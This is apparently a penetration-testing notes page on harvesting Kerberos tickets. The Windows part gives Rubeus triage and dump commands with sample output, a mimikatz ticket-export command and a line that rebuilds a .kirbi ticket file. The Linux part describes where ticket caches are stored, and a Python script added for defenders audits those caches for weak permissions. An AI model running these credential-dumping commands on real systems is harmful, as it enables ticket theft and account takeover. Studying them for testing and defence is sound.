88 - Kerberos
Harvest tickets from Windows
Rubeus triage will list the Kerberos tickets in all the logon sessions currently on a system. If you're not in an elevated context, it can only show tickets in your own logon session.
C:\Tools\Rubeus\Rubeus\bin\Debug> Rubeus.exe triage
------------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
------------------------------------------------------------------------------------------------------------------
| 0x79474 | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 10/18/2021 4:13:03 PM |
| 0x3e4 | srv-1$ @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 10/18/2021 4:11:00 PM |
| 0x1f8cd | jking @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO | 10/18/2021 4:10:56 PM |
# Using mimikatz
sekurlsa::tickets /export
# Dump all tickets with Rubeus
.\Rubeus dump
# Decode a base64-encoded ticket and write it to a .kirbi file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
Harvest tickets from Linux
On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:
Files, by default under the /tmp directory, in the form of krb5cc_%{uid}.
Kernel keyrings, a special space in the Linux kernel provided for storing keys.
Process memory, used when only one process needs to use the tickets.
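
An added example for defenders (not code from the original page): it classifies a KRB5CCNAME-style value into the three storage types above and audits file-based caches for permissions or ownership that expose them to other accounts. The function names, the optional `_suffix` allowed after the uid, and the empty scratch files built in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Type prefixes of a KRB5CCNAME / default_ccache_name value, mapped to the
# three storage locations listed above.
CCACHE_TYPES = {"FILE": "file", "KEYRING": "kernel keyring", "MEMORY": "process memory"}
CACHE_NAME = re.compile(r"krb5cc_(\d+)(?:_.*)?")  # krb5cc_<uid>, optional suffix (assumption)


def classify_ccache(name):
    """Return the storage type named by a ccache string such as FILE:/tmp/krb5cc_1000."""
    prefix, sep, _ = name.partition(":")
    if not sep:
        return "file"  # MIT krb5 treats a bare path as a FILE cache
    return CCACHE_TYPES.get(prefix.upper(), "other")


def audit_ccache_files(directory="/tmp"):
    """Map each risky krb5cc_<uid> file in `directory` to the list of problems found."""
    findings = {}
    for entry in os.listdir(directory):
        match = CACHE_NAME.fullmatch(entry)
        if not match:
            continue
        info = os.lstat(os.path.join(directory, entry))  # lstat: do not follow symlinks
        issues = []
        if not stat.S_ISREG(info.st_mode):
            issues.append("not a regular file")
        if info.st_mode & 0o077:
            issues.append("accessible by group/other")
        if info.st_uid != int(match.group(1)):
            issues.append("owner differs from uid in name")
        if issues:
            findings[entry] = issues
    return findings


def demo():
    """Audit a scratch directory holding three constructed, empty cache files."""
    uid = os.getuid()
    samples = {f"krb5cc_{uid}": 0o600, f"krb5cc_{uid}_loose": 0o644, f"krb5cc_{uid + 1}": 0o600}
    with tempfile.TemporaryDirectory() as scratch:
        for name, mode in samples.items():
            path = os.path.join(scratch, name)
            open(path, "wb").close()
            os.chmod(path, mode)
        return uid, audit_ccache_files(scratch)
```

Run `audit_ccache_files()` against /tmp on a host to list file caches that should be tightened to mode 0600 and owned by the uid in their name.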